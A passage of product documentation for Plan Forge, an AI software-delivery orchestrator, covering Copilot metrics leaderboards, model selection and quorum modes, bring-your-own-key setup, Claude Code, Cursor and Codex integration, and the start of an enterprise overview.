The Copilot Metrics API (available at the org and enterprise level via gh api /orgs/{org}/copilot/metrics) surfaces AI-assisted PR rate, code-suggestion acceptance, and code-review usage across your teams. Plan Forge pulls that data alongside its own plan-execution metrics (slices shipped, MTTR, drift rate) and presents them in a single leaderboard view on the dashboard.

Pulling Metrics API data

Fetch and cache the latest Copilot Metrics API payload with:

pforge github metrics pull

By default this targets the org inferred from git remote get-url origin. Override with --org <name>. For enterprise-level metrics, use --enterprise <slug>. The pull authenticates via the gh CLI; run gh auth status first if you see a 401.

Additional flags:

Flag	Default	Effect
`--team <slug>`	(all teams)	Filter to a single team slug. Repeatable for multiple teams.
`--since <ISO-date>`	30 days ago	Start of the pull window. Metrics API returns daily buckets.
`--out <path>`	`.forge/metrics/copilot-<date>.jsonl`	Override the output path. Use `-` to print to stdout.
`--no-cache`	(cache enabled)	Force a fresh API fetch even if a cached response exists.

JSONL schema and schema versioning

Each line written to .forge/metrics/ is a JSON object with a stable _schema field so downstream consumers (dashboards, CI scripts, forge_github_metrics) can handle forward evolution without breakage:

{
  "_schema": "copilot-metrics/v1",
  "date": "2026-05-05",
  "org": "acme",
  "team": "platform",
  "ai_pr_rate": 0.74,
  "acceptance_rate": 0.61,
  "code_review_usage": 0.43,
  "active_users": 18,
  "_pulled_at": "2026-05-05T11:00:00Z"
}

The schema version follows <namespace>/v<N>. A bump to v2 will only happen when a field is removed or renamed; adding fields is non-breaking. Consumers should read _schema and warn (not crash) on unknown versions. The pforge-mcp/metrics-schema.mjs module exports CURRENT_SCHEMA, validateRow(row), and migrateRow(row) for any tool that reads the JSONL files.
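A consumer that follows the "warn, don't crash" guidance might look like the sketch below. It deliberately does not use the exports of pforge-mcp/metrics-schema.mjs, whose signatures are not documented here; `readMetricsJsonl` and `KNOWN_SCHEMAS` are hypothetical names, and skipping unknown rows (rather than attempting migration) is an assumption.

```javascript
// Schema versions this consumer understands.
const KNOWN_SCHEMAS = new Set(["copilot-metrics/v1"]);

// Parses JSONL text into rows, collecting warnings instead of throwing.
function readMetricsJsonl(text) {
  const rows = [];
  const warnings = [];
  text.split("\n").forEach((line, index) => {
    if (line.trim() === "") return; // tolerate blank lines
    let row;
    try {
      row = JSON.parse(line);
    } catch {
      warnings.push(`line ${index + 1}: not valid JSON, skipped`);
      return;
    }
    const schema = row?._schema;
    if (!KNOWN_SCHEMAS.has(schema)) {
      warnings.push(`line ${index + 1}: unknown schema ${schema}, skipped`);
      return;
    }
    rows.push(row);
  });
  return { rows, warnings };
}
```

The caller decides how to surface `warnings`, for example by logging them, while still rendering whatever rows were understood.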

Dashboard tab placement — Forge group vs GitHub group

The dashboard sidebar organises tabs into two groups:

Forge group: tabs sourced entirely from Plan Forge data (Timeline, Cost, Forge Master, Digest). These work offline and do not require a GitHub connection.
GitHub group: tabs that join Plan Forge data with GitHub API data, namely Metrics Leaderboard (this section) and, in a future release, Spaces. These tabs show a "Connect GitHub" prompt when gh auth status returns non-zero or no pull has been run yet.

The Metrics Leaderboard tab sits at the top of the GitHub group. It renders a table of teams ranked by a composite score, shown next to their Plan Forge plan-completion rate for the same window. The composite score is a weighted blend of AI-assisted PR rate (40%), acceptance rate (40%), and code-review usage (20%). Hovering a row reveals the raw daily time-series chart.
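The 40/40/20 weighting works out as in the sketch below, which uses the field names from the JSONL schema. It assumes one already-aggregated row per team for the window; how the dashboard aggregates daily buckets is not specified here, and `compositeScore` and `rankTeams` are hypothetical names.

```javascript
// Weights from the leaderboard description: 40% / 40% / 20%.
const WEIGHTS = { ai_pr_rate: 0.4, acceptance_rate: 0.4, code_review_usage: 0.2 };

// Weighted blend of the three Metrics API rates for one team row.
function compositeScore(row) {
  return Object.entries(WEIGHTS).reduce(
    (sum, [field, weight]) => sum + weight * row[field],
    0
  );
}

// Highest composite score first.
function rankTeams(rows) {
  return rows
    .map((row) => ({ team: row.team, score: compositeScore(row) }))
    .sort((a, b) => b.score - a.score);
}
```

For the sample row shown in the schema section (0.74, 0.61, 0.43), the blend is 0.4 × 0.74 + 0.4 × 0.61 + 0.2 × 0.43 = 0.626.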

Tab group placement is controlled by the group field in pforge-mcp/dashboard/tab-registry.mjs. Tabs with group: "github" are hidden when the GitHub group is collapsed (the user preference persists in localStorage).

Readiness widget (v2.90.8). The top of the Metrics Leaderboard tab now renders a compact readiness widget that mirrors the eight checks from pforge github status as coloured glyphs. When all eight checks pass the widget collapses to a single ✓ summary line to keep the leaderboard table in view. The widget is served by the new GET /api/github/readiness endpoint and refreshes automatically when the MCP server restarts or when pforge github status writes a new snapshot to .forge/github-status.json.

The `forge_github_metrics` MCP tool

forge_github_metrics exposes the leaderboard data to any MCP client (Copilot Chat, Claude Code, Cursor). It reads from the cached JSONL in .forge/metrics/ and never calls the GitHub API directly, so it works offline and in air-gapped environments after an initial pull.

// In Copilot Chat or any MCP client:
forge_github_metrics({ team: "platform", since: "2026-04-01" })

Input schema:

Field	Type	Default	Description
`team`	string \| string[]	(all teams)	Filter by team slug(s).
`since`	ISO date string	30 days ago	Start of the aggregation window.
`metric`	"all" \| "ai_pr_rate" \| "acceptance_rate" \| "code_review_usage"	"all"	Return only the specified metric column.
`format`	"leaderboard" \| "timeseries" \| "raw"	"leaderboard"	`leaderboard` = ranked table; `timeseries` = per-team daily arrays; `raw` = unprocessed JSONL rows.

The tool is registered in pforge-mcp/server.mjs alongside forge_github_status and is listed in pforge-mcp/tools.json. It is included in the Plan Forge MCP server entry in .vscode/mcp.json without requiring a separate setup run; the tool registration is additive and is picked up on the next MCP server restart.

Cache TTL for the dashboard endpoint

The dashboard's GET /api/metrics/leaderboard endpoint serves the aggregated leaderboard from the on-disk JSONL cache. It does not proxy the GitHub API on demand. Cache staleness is controlled by two settings in .forge.json:

{
  "metrics": {
    "cacheTtlMinutes": 60,
    "staleWarningMinutes": 480
  }
}

cacheTtlMinutes (default: 60): the dashboard appends a Cache-Control: max-age=<N×60> header, which browsers and CDNs respect. The in-process in-memory cache is also flushed after this window, so the next request re-reads from disk.
staleWarningMinutes (default: 480 = 8 hours): if the newest JSONL row is older than this, the leaderboard tab shows a ⚠ Data may be stale banner with the age and a one-click Re-pull button that runs pforge github metrics pull in the background.

Set cacheTtlMinutes: 0 to disable the in-memory cache entirely (reads from disk on every request). Useful in CI environments where the JSONL files are updated by a scheduled workflow and you want every page load to reflect the latest data.
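The arithmetic behind the two settings is small enough to sketch. The helper names are hypothetical, and two details are assumptions: that a TTL of 0 simply yields `max-age=0`, and that row age is measured from the `_pulled_at` timestamp.

```javascript
// Cache-Control value for a TTL in minutes (N minutes -> N * 60 seconds).
function cacheControlHeader(cacheTtlMinutes = 60) {
  return `max-age=${cacheTtlMinutes * 60}`;
}

// Age of the newest row and whether the stale banner should show.
// newestPulledAt: ISO timestamp string; now: Date.
function staleness(newestPulledAt, now, staleWarningMinutes = 480) {
  const ageMinutes = Math.floor((now.getTime() - new Date(newestPulledAt).getTime()) / 60000);
  return { ageMinutes, stale: ageMinutes > staleWarningMinutes };
}
```

With the defaults, a row pulled nine hours ago has an age of 540 minutes and would trigger the banner, while a row pulled one hour ago would not.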

Per-team join key precedence

The leaderboard joins Metrics API rows (keyed by GitHub team slug) with Plan Forge plan-completion rows (keyed by the team field in the plan frontmatter). In practice these two key spaces often diverge: a GitHub team might be platform-eng while the plan frontmatter uses platform.

Plan Forge resolves the join using the following precedence order:

Explicit mapping in .forge.json#metrics.teamMap, highest precedence. Map GitHub team slugs to plan team labels:

{
  "metrics": {
    "teamMap": {
      "platform-eng": "platform",
      "fe-core":       "frontend"
    }
  }
}

Slug normalisation: if no explicit mapping exists, Plan Forge applies a normaliser (lowercase, strip a trailing -eng / -team / -squad, replace hyphens with underscores). If the normalised forms match, the rows are joined.
Exact match: if normalisation still doesn't produce a match, the rows are left unjoined. Metrics API rows without a plan partner appear in the leaderboard with plan-side columns as —, and vice versa. No silent data loss; mismatches are surfaced explicitly.
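The precedence order above can be sketched as follows. This is one reading of the rules, not the leaderboard's actual join code: `normaliseSlug` and `resolvePlanTeam` are hypothetical names, the normaliser is applied to both sides before comparing, and the final step is treated as the "leave unjoined" fallback by returning `null`.

```javascript
// Lowercase, strip one trailing -eng / -team / -squad, hyphens to underscores.
function normaliseSlug(slug) {
  return slug
    .toLowerCase()
    .replace(/-(eng|team|squad)$/, "")
    .replace(/-/g, "_");
}

// Returns the plan team label a GitHub team slug joins to, or null if unjoined.
function resolvePlanTeam(githubSlug, planLabels, teamMap = {}) {
  // 1. Explicit mapping wins.
  if (Object.prototype.hasOwnProperty.call(teamMap, githubSlug)) {
    return teamMap[githubSlug];
  }
  // 2. Compare normalised forms of both keys.
  const wanted = normaliseSlug(githubSlug);
  const match = planLabels.find((label) => normaliseSlug(label) === wanted);
  // 3. No match: the row stays unjoined and is surfaced as such.
  return match === undefined ? null : match;
}
```

A `null` result corresponds to a row rendered with — in the plan-side columns, which is the cue to add an entry to `teamMap`.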

Run pforge github metrics pull --dry-run to see a join-preview table: every Metrics API team slug listed next to the plan team label it resolves to, and a no match flag for unresolved rows. This makes it easy to build up the teamMap incrementally.

Prerequisite: gh CLI must be authenticated (gh auth status) and the repo's org must have Copilot Metrics API access enabled (requires GitHub Copilot Business or Enterprise). Run pforge github status to verify the GitHub stack readiness before pulling metrics.

7. BYOK and the multi-model picker

GitHub Copilot ships a built-in multi-model picker that lets individual developers switch between supported models (GPT-4o, Claude Sonnet, Gemini, and others) inside their editor. Plan Forge has its own orthogonal model-selection surface: the --model flag and the quorum system. This section explains how the two compose, when BYOK (bring-your-own-key) matters, and when the picker is enough.

The `--model` flag

Every plan-execution command accepts a --model flag that overrides the default model for the entire run:

pforge run-plan docs/plans/Phase-28-PLAN.md --model gpt-4.1
pforge run-plan docs/plans/Phase-28-PLAN.md --model claude-sonnet-4.5
pforge run-plan docs/plans/Phase-28-PLAN.md --model grok-3

The value is forwarded to the Forge-Master reasoning layer (pforge-master/src/reasoning.mjs), which resolves it against the configured provider table in .forge.json#providers. If no provider entry exists for the requested model, Forge-Master falls back to the default provider and logs a warn event to the timeline.

The flag is independent of the Copilot multi-model picker. A developer can have GPT-4o selected in their editor picker while Plan Forge runs a plan with --model claude-sonnet-4.5. The two selections do not interfere, because Copilot Chat and Plan Forge use separate request paths.

Quorum modes: `auto`, `power`, `speed`, and `false`

For high-stakes slices (deploy steps, schema migrations, security patches), Plan Forge can run the same slice prompt across multiple models and require a threshold of agreement before committing. This is the quorum system.

pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=power   # flagship models, threshold 5
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=speed   # fast models, threshold 7
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=auto    # Plan Forge picks mode per slice
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=false   # disable quorum entirely

Mode	Models polled	Agreement threshold	Best for
`power`	Up to 3 flagship models (GPT-5, Claude Opus, Grok-4)	5 / 7 points	Deploy slices, schema migrations
`speed`	Up to 3 fast models (GPT-4.1, Claude Haiku, Grok-3-mini)	7 / 7 points	High-volume code generation, CI budget caps
`auto`	Plan Forge selects per slice based on slice risk tags	Per-slice	Mixed plans; recommended default
`false`	Single model only	N/A	Local development, cost sensitivity

Cost estimates for each mode are available before you run by calling forge_estimate_quorum (MCP) or running:

pforge run-plan --estimate docs/plans/Phase-28-PLAN.md

This prints a projected cost breakdown under each of the four quorum modes, sourced from the live token-price table in pforge-mcp/cost/price-table.mjs, not hand-computed approximations.

When BYOK matters

BYOK is the practice of supplying your own API key directly to a model provider rather than routing through GitHub Copilot's proxy. Plan Forge supports BYOK for any provider that exposes an OpenAI-compatible endpoint. Set the key in .forge/secrets.json (gitignored) or via environment variable:

# .forge/secrets.json (gitignored)
{
  "XAI_API_KEY": "xai-...",
  "ANTHROPIC_API_KEY": "sk-ant-...",
  "OPENAI_API_KEY": "sk-..."
}

# Or as environment variables:
export XAI_API_KEY=xai-...
pforge run-plan docs/plans/Phase-28-PLAN.md --model grok-4

BYOK matters in the following situations:

Model not in the Copilot picker: Grok-4, Grok-3, and Grok-3-mini are only reachable via direct xAI keys today. Set XAI_API_KEY and they become available to --model and quorum.
Higher rate limits: a GitHub Copilot Business seat has shared rate-limit headroom, whereas direct BYOK keys give dedicated limits. In heavy quorum runs (power mode across three flagship models), hitting the shared rate limit stalls the run. BYOK avoids the contention.
Data-residency or audit requirements: some organisations route only approved models through the Copilot proxy for compliance. BYOK lets the remainder go direct without touching the proxy at all.
Cost arbitrage: the Copilot Business per-seat fee is often cheaper per token for everyday chat, but a heavy automated quorum run on flagship models may be cheaper billed direct at volume pricing. Run pforge run-plan --estimate to compare.

Copilot picker vs Plan Forge model selection: the short answer

The Copilot multi-model picker is the right tool when a human developer is choosing a model interactively for chat or inline suggestions. Plan Forge model selection (--model, quorum) is the right tool when an automated plan execution run needs reproducible, auditable model routing with cost tracking and agreement enforcement. The two are complementary:

During development, let the picker follow the developer's preference.
During pforge run-plan execution (CI or local), lock the model via --model or quorum so the run is reproducible across machines.
If both are unset, Forge-Master uses the provider priority list in .forge.json#providers. The Copilot picker setting has no effect on headless plan runs.

Provider configuration in `.forge.json`

The full provider table lives under .forge.json#providers. Each entry maps a model identifier to a provider, base URL, and optional per-model settings:

{
  "providers": {
    "default": "githubCopilot",
    "models": {
      "gpt-5.4":           { "provider": "githubCopilot" },
      "claude-sonnet-4.6": { "provider": "githubCopilot" },
      "grok-4":            { "provider": "xai",   "baseUrl": "https://api.x.ai/v1" },
      "grok-3":            { "provider": "xai",   "baseUrl": "https://api.x.ai/v1" },
      "grok-3-mini":       { "provider": "xai",   "baseUrl": "https://api.x.ai/v1" }
    }
  }
}

The internal provider key for GitHub Copilot is "githubCopilot" (not "github-copilot"). Using the wrong key causes selectProvider to return null and fall through to the default. Run pforge smith to validate your provider table and surface misconfiguration before a plan run.
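The lookup-then-fallback behaviour described in this section can be pictured with a short sketch over the `.forge.json#providers` shape shown above. It is not the Forge-Master `selectProvider` function; `resolveProvider` and the `fellBack` flag are hypothetical, and the real code also logs a warn event to the timeline, which is omitted here.

```javascript
// providers: the object under .forge.json#providers ({ default, models }).
function resolveProvider(providers, model) {
  const models = providers.models || {};
  if (Object.prototype.hasOwnProperty.call(models, model)) {
    return { ...models[model], model, fellBack: false };
  }
  // No entry for this model: fall back to the default provider.
  return { provider: providers.default, model, fellBack: true };
}
```

A caller can check `fellBack` to decide whether to surface a warning before the run starts.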

Tip: Run pforge smith (forge environment diagnostics) and pforge github status together before any quorum run. smith validates the provider table and API keys; github status confirms the GitHub stack readiness. Both must pass before a power-quorum run on a deploy slice.

8. Other agent platforms (Claude Code, Cursor, Codex)

Plan Forge runs against any agent, not just GitHub Copilot. This section covers the three most common alternatives: Claude Code, Cursor, and Codex. For each platform it describes what works out of the box, what requires one extra step, and what is GitHub-only and therefore not available outside GitHub Copilot.

The honest framing is a depth-of-integration spectrum. Plan Forge has its deepest automated path on GitHub Copilot (Sections 1–7). The platforms below share the platform-independent subset of that surface, and each diverges in one or two specific areas. None of these gaps block Plan Forge from running end-to-end.

Cross-platform baseline — what works everywhere

Before covering the per-platform differences, here is the shared foundation that works identically on all four platforms (Copilot, Claude Code, Cursor, Codex):

Capability	How it works on any platform
`pforge run-plan` execution	The CLI dispatcher, quorum system, validation gates, and trajectory capture all run in-process. No agent platform is required; the CLI is the runtime.
`AGENTS.md` context	Generated by `setup.sh` / `setup.ps1` alongside `copilot-instructions.md`. All four platforms read `AGENTS.md` for project architecture, quick commands, and pipeline reference.
`.github/instructions/*.instructions.md`	Instruction files are referenced directly from plan prompts and the Step-2 hardener. The agent platform consuming the prompt sees them via file inclusion, regardless of which IDE or agent is active.
BYOK model selection	The `--model` flag and `.forge/secrets.json` API keys work the same on all platforms. Any agent can execute a plan run with any model.
MCP tools (where MCP is supported)	Claude Code and Cursor both support MCP. They can call `forge_run_plan`, `forge_analyze`, `forge_estimate_quorum`, and the rest of the 102 MCP tools directly from chat. Codex does not support MCP today.

Claude Code

Claude Code is Anthropic's terminal-native agentic coding environment. Of the three platforms covered in this section, it has the closest feature parity with GitHub Copilot for Plan Forge purposes, for two reasons: it supports MCP natively, and it reads AGENTS.md on every session start.

Setup for Claude Code

After running setup.sh (or setup.ps1), Plan Forge's MCP server is registered in .vscode/mcp.json. Claude Code reads MCP configuration from a separate file at ~/.claude/mcp.json (global) or .claude/mcp.json (per-project). Copy the Plan Forge entry across:

# Extract the Plan Forge MCP entry from VS Code's config and write it to Claude Code's config
pforge setup --agent claude

The --agent claude flag (available from setup.sh and setup.ps1) writes a Claude-compatible MCP config file at .claude/mcp.json alongside the standard VS Code config. Once the MCP server is registered, all 102 Plan Forge tools are available from Claude Code's chat interface.

What works on Claude Code

Feature	Status	Notes
`pforge run-plan` (CLI)	✓ full	Identical to Copilot; the CLI runs independently of the agent platform.
MCP tools in chat	✓ full	Run `pforge setup --agent claude` once to register the server.
`AGENTS.md` context	✓ full	Claude Code reads `AGENTS.md` natively on session start.
Instruction files (`.github/instructions/`)	✓ full	Referenced via prompt includes; Claude Code sees them through file read calls.
BYOK model selection	✓ full	Set `ANTHROPIC_API_KEY` in `.forge/secrets.json` or environment.
Copilot Coding Agent dispatch (`--worker copilot-coding-agent`)	✗ GitHub-only	Requires GitHub Copilot Coding Agent, which is a GitHub product. Not applicable when using Claude Code as the primary agent.
GHAS / CodeQL integration (`pforge plan-from-sarif`)	✓ full	SARIF parsing is CLI-only and works regardless of agent platform. The GHAS API calls require `gh` CLI and a GitHub-hosted repo.
Copilot Spaces sync (`pforge sync-spaces`)	✗ GitHub-only	Copilot Spaces is a GitHub product. Not applicable outside GitHub Copilot.

Invoking Plan Forge from Claude Code chat

With the MCP server registered, the full Plan Forge surface is available from Claude Code's chat:

"Call forge_run_plan on docs/plans/Phase-28-PLAN.md with quorum=auto and tell me the projected cost first."

Claude Code will call forge_estimate_quorum, present the cost breakdown, then, with confirmation, call forge_run_plan. The execution loop, trajectory capture, and dashboard updates all behave identically to a Copilot Chat invocation.

Cursor

Cursor is an AI-first code editor built on VS Code. It reads AGENTS.md as a cross-agent context document and supports MCP via the same .vscode/mcp.json that Plan Forge already writes. In most cases, Cursor requires no additional setup after setup.ps1 / setup.sh: the VS Code MCP config is the Cursor MCP config.

Cursor-specific context files

Cursor also reads its own rule files from .cursor/rules/. If your repo has a .cursor/rules/ directory, you can mirror the most critical Plan Forge instruction files there. Plan Forge does not write to .cursor/rules/ automatically, but the setup flag generates the directory with recommended stubs:

pforge setup --agent cursor

This creates .cursor/rules/plan-forge.mdc with a condensed version of the architecture principles, pipeline reference, and quick-command list, the subset most useful for inline suggestions and Agent mode. The file is a stub you can extend; Plan Forge does not overwrite it on subsequent pforge update runs.

What works on Cursor

Feature	Status	Notes
`pforge run-plan` (CLI)	✓ full	Run from Cursor's integrated terminal; identical to any terminal.
MCP tools in Agent mode	✓ full	Cursor reads `.vscode/mcp.json`; no extra config needed after `setup`.
`AGENTS.md` context	✓ full	Cursor reads `AGENTS.md` for cross-agent context.
Cursor rules (`.cursor/rules/`)	⚠ optional	Run `pforge setup --agent cursor` to generate stub rules. Not required but improves inline suggestion quality.
BYOK model selection	✓ full	Cursor has its own model picker; Plan Forge's `--model` flag is independent and applies to CLI/MCP invocations.
Copilot Coding Agent dispatch	✗ GitHub-only	Not applicable when using Cursor as the primary agent.
GHAS / CodeQL integration	✓ full	CLI-based; works from Cursor's terminal.
Copilot Spaces sync	✗ GitHub-only	Copilot Spaces is a GitHub product.

Cursor + Copilot combination: Many teams use Cursor as their primary editor while keeping GitHub Copilot active for PR reviews and the Copilot Chat panel. In this setup, Plan Forge serves both surfaces: Cursor gets MCP tools and .cursor/rules/ context, while Copilot gets instruction files and prompt files via the .github/ directory. Both share the same AGENTS.md and .vscode/mcp.json.

Codex

Codex is OpenAI's cloud-based coding agent. It operates as a sandboxed execution environment that clones your repository, reads AGENTS.md for context, executes tasks, and opens a PR with the results. This workflow parallels GitHub Copilot Coding Agent's dispatch loop described in Section 3.

Setup for Codex

pforge setup --agent codex

The --agent codex flag ensures AGENTS.md is present and well-formed (Codex is strict about its format), and sets up the codex-setup-steps.yml file at .github/codex-setup-steps.yml if it does not already exist. The setup file tells Codex how to bootstrap the repo environment (install dependencies, set environment variables, run initial checks) before it begins executing tasks.

Dispatching to Codex

Codex does not support MCP, so it cannot call Plan Forge tools from chat. Instead, Plan Forge dispatches to Codex by writing the slice prompt into a task file and passing it through the Codex task interface. The equivalent of --worker copilot-coding-agent for Codex is:

pforge run-plan --worker codex docs/plans/my-feature-PLAN.md

This generates a task description for each slice (same structure as the Copilot Coding Agent issue body, minus the GitHub-issue wrapper), submits it to the Codex API, polls for the resulting PR, and captures the trajectory. The loop is identical to the Copilot Coding Agent dispatch loop, except that the delivery mechanism is the Codex API rather than the GitHub Issues API.

Prerequisites: the OPENAI_API_KEY must be set in .forge/secrets.json or as an environment variable, and the repo must be connected to the Codex environment (done once via pforge setup --agent codex).
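The submit, poll, and capture loop described above can be sketched as follows. This is a minimal illustration under stated assumptions, not Plan Forge's implementation: submit_task and fetch_pr are hypothetical callables standing in for whatever the Codex task interface exposes, and the polling interval and timeout are assumed values.

```python
import time
from dataclasses import dataclass, field
from typing import Callable, Optional


@dataclass
class SliceResult:
    slice_id: str
    pr_url: Optional[str]
    trajectory: list = field(default_factory=list)  # ordered log of what happened


def dispatch_slice(
    slice_id: str,
    prompt: str,
    submit_task: Callable[[str], str],          # hypothetical: returns a task id
    fetch_pr: Callable[[str], Optional[str]],   # hypothetical: PR URL, or None if not ready
    poll_interval_s: float = 5.0,               # assumed value
    timeout_s: float = 600.0,                   # assumed value
    sleep: Callable[[float], None] = time.sleep,
) -> SliceResult:
    """Submit one slice prompt, then poll until a PR appears or the timeout expires."""
    result = SliceResult(slice_id=slice_id, pr_url=None)
    task_id = submit_task(prompt)
    result.trajectory.append(("submitted", task_id))

    waited = 0.0
    while waited < timeout_s:
        pr_url = fetch_pr(task_id)
        if pr_url is not None:
            result.pr_url = pr_url
            result.trajectory.append(("pr_opened", pr_url))
            return result
        result.trajectory.append(("polled", waited))
        sleep(poll_interval_s)
        waited += poll_interval_s

    # No PR showed up in time; the caller decides whether to retry or escalate.
    result.trajectory.append(("timed_out", waited))
    return result
```

Passing sleep as a parameter keeps the loop testable without real waiting; a caller that wants backoff can swap in a different sleep strategy.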

What works on Codex

Feature	Status	Notes
`pforge run-plan` (CLI)	✓ full	CLI runs independently; identical behavior.
Cloud dispatch (`--worker codex`)	✓ full	Requires `OPENAI_API_KEY` and `pforge setup --agent codex`.
`AGENTS.md` context	✓ full	Codex reads `AGENTS.md` as its primary context document. Keep this file up to date with `pforge update`.
MCP tools in chat	✗ not supported	Codex does not support MCP today. Plan Forge tools are available only via `pforge run-plan` CLI and the Codex dispatch loop.
BYOK model selection	✓ full	Set `OPENAI_API_KEY`; use `--model gpt-5.4` etc.
GHAS / CodeQL integration	✓ full	CLI-based SARIF parsing works regardless of agent. GHAS API requires `gh` CLI and a GitHub-hosted repo.
Copilot Spaces sync	✗ GitHub-only	Copilot Spaces is a GitHub product.

Codex vs Copilot Coding Agent: choosing between dispatch workers. Both workers clone the repo, execute the slice, and open a PR. The practical difference is auth surface: --worker copilot-coding-agent requires a GitHub Copilot Coding Agent seat; --worker codex requires an OpenAI API key. If your org has both, prefer copilot-coding-agent for repos already on GitHub, because the PR telemetry, trajectory capture, and Copilot Activity tab integration are deeper. Use --worker codex when the primary model preference is GPT-class and Copilot Coding Agent is not enabled at the org level.

Platform comparison at a glance

Feature	GitHub Copilot	Claude Code	Cursor	Codex
`pforge run-plan` CLI	✓	✓	✓	✓
MCP tools in chat	✓	✓	✓	✗
`AGENTS.md` context	✓	✓	✓	✓
Cloud dispatch worker	`copilot-coding-agent`	—	—	`codex`
GHAS / SARIF integration	✓	✓	✓	✓
Copilot Spaces sync	✓	✗	✗	✗
GitHub Metrics API leaderboard	✓	⚠ CLI pull only	⚠ CLI pull only	⚠ CLI pull only
One-step setup	`setup.sh`	`setup.sh --agent claude`	`setup.sh --agent cursor`	`setup.sh --agent codex`

Reading the table: ✓ = works fully; ⚠ = works with one extra step or reduced depth; ✗ = not available on this platform. No row marked ✗ prevents pforge run-plan from executing end-to-end.

9. Built with Plan Forge

This chapter was written by Plan Forge. Sections 3 through 8 were drafted by pforge run-plan dispatching to GitHub Copilot via the gh-copilot worker; Sections 1 and 2 were written manually because of their small surface. Each worker-drafted section is a captured slice trajectory you can audit.

Section 9 itself, the artifact you're reading now, is the dogfood of the dogfood: a single live --worker copilot-coding-agent dispatch against this same repository, captured at runtime.

Captured runs

Section	Plan	Worker	Cost	Trajectory
1, 2 (readiness + 8 primitives)	Phase GITHUB-A plan on GitHub	Manual (small surface)	$0.00	`d7e9cf8`
3, 4 (Coding Agent + GHAS)	Phase GITHUB-B plan on GitHub	`gh-copilot` worker	$0.07	`fb39b4d` + 9 slice commits
6 (Metrics API)	Phase GITHUB-D plan on GitHub	`gh-copilot` worker	$0.04	`28fe1ef` + 7 slice commits
5, 7, 8 (Spaces + BYOK + other agents)	Phase GITHUB-C plan on GitHub	`gh-copilot` worker	$0.05	`7e14d34` + 4 slice commits
9 (this section)	Dogfood plan on GitHub (per runbook on GitHub)	`copilot-coding-agent` worker (real dispatch)	$0.01	Issue #150 + `bb56040`

Total spend to write this chapter: $0.17 across the worker-executed slices listed above. The dispatch pipeline for --worker copilot-coding-agent is verified end-to-end against this repo; once Copilot Coding Agent is enabled at the repo level, re-running the dogfood plan should round-trip a full Issue → PR → merge cycle in a single command.
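As a quick check on the total, the Cost column of the table above can be summed directly. The sketch below uses Decimal rather than float so that cent-level values add up exactly; the dictionary keys are just the section groups from the table.

```python
from decimal import Decimal

# Cost column from the "Captured runs" table, keyed by section group.
captured_costs = {
    "1, 2": Decimal("0.00"),
    "3, 4": Decimal("0.07"),
    "6": Decimal("0.04"),
    "5, 7, 8": Decimal("0.05"),
    "9": Decimal("0.01"),
}

total = sum(captured_costs.values(), Decimal("0"))
print(f"Total: ${total}")  # Total: $0.17
```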

Using Spec Kit with this repo? Plan Forge can auto-import your spec.md, plan.md, tasks.md, and constitution.md directly into a Crucible smelt, with no re-specifying needed.

See the Spec Kit Interop chapter for the complete field-mapping reference, import procedure, and ecosystem extension details.

A glowing golden compass rose floating above the anvil, with six radiating beams ending in icons for the six enterprise concerns: network, architecture, calendar, security shield, audit ledger, deployment rocket

Appendix J

Plan Forge for Enterprise

The landing page for enterprise evaluators: reference architecture, GitHub stack alignment, operator playbook, compliance reference, and the map of where to find every enterprise answer.

Audience: Platform leads, security architects, and engineering managers evaluating Plan Forge for multi-team deployment in regulated or large-scale environments.

TL;DR: Plan Forge is the open-source AI-SDLC orchestrator for teams whose code lives on GitHub. It is local-first by design (no Plan Forge SaaS plane), composes cleanly with Microsoft Foundry and other enterprise model gateways, and ships the orchestration layer GitHub explicitly leaves to the ecosystem.

Why Plan Forge for the enterprise

Most "AI-SDLC" tools today are point solutions: a code completion in the IDE, an autonomous agent that opens one PR, a code reviewer that comments on PRs. Plan Forge is the layer above those: a plan-driven, gate-enforced, cost-tracked, multi-slice orchestration framework that turns a feature spec into a series of validated commits.

Three structural choices make it enterprise-fit:

Local-first / air-gappable control plane. The orchestrator runs on the developer's box or a CI runner. There is no Plan Forge SaaS service. Source code does not leave the customer's network unless the customer chooses to call a hosted LLM (and even then, all logging stays local). This is a structural difference from Cursor (workers can run on-prem but the control plane is in AWS) and Sourcegraph Amp (cloud-only, no self-host, no BYOK).
GitHub-native by design, not by integration. Plans, slices, and validation gates compose with GitHub Issues, Copilot Cloud Agent, Actions, AGENTS.md, and the GitHub MCP server. The architecture extends GitHub primitives in the direction that GitHub has signaled (via the Copilot SDK preview and AGENTS.md/MCP/Skills as Linux Foundation standards) belongs to the ecosystem.
Open standards throughout. AGENTS.md, MCP, Agent Skills, and OpenTelemetry gen_ai.* semantic conventions are first-class. No proprietary file formats, no vendor lock-in, no "you must use our cloud."

Where to find what you need

This page is a map. Each link goes to the document that answers a specific enterprise concern.

Architecture and reference deployments

You're asking	Read
What does a 5-team Plan Forge deployment look like?	Reference Architecture
How does Plan Forge compose with Microsoft Foundry / Azure OpenAI in our tenant?	Reference Architecture — Microsoft-shop variant
How does Plan Forge align with the GitHub stack we already pay for?	GitHub Stack Alignment (Appendix H), and the deeper Plan Forge on the GitHub Stack (Appendix I)
How do we onboard 12 squad members on Day 1?	Agent Factory Recipe

Operations

You're asking	Read
What does Day 1 / Week 4 / Week 12 look like for a team adopting Plan Forge?	Fleet Operator Playbook
How do we run Plan Forge across N teams with shared visibility?	Fleet Operator Playbook — Multi-Team
What metrics should we track?	Fleet Operator Playbook — KPIs

Security, compliance, data residency

You're asking	Read
What gets logged, where, in what format, and how do we export it for audit?	Compliance and Data Residency
Where does our source code go when we run Plan Forge?	Compliance — Data Flow
Can we run Plan Forge fully air-gapped?	Compliance — Air-Gapped
Does Plan Forge work with Azure Government?	Compliance — Azure Government
What about HIPAA, FedRAMP, SOC2, PCI?	Compliance — Compliance Posture

Identity, auth, RBAC

You're asking	Read
How does authentication work today?	Compliance — Identity
What's the roadmap for Entra ID / SAML / SCIM?	Compliance — Roadmap

Telemetry and observability

You're asking	Read
Can we ship Plan Forge traces to Splunk / Datadog / Application Insights?	Compliance — Observability Export

Cost and budgeting

You're asking	Read
How do we estimate cost for a plan before running it?	Fleet Operator Playbook — Cost Discipline
How do we attribute cost to teams and engineers?	Fleet Operator Playbook — Cost Attribution

What Plan Forge is not

We are deliberate about lanes. Plan Forge is not:

An IDE replacement. Cursor, Windsurf, VS Code Copilot Chat all do that better. Plan Forge sits above the IDE.
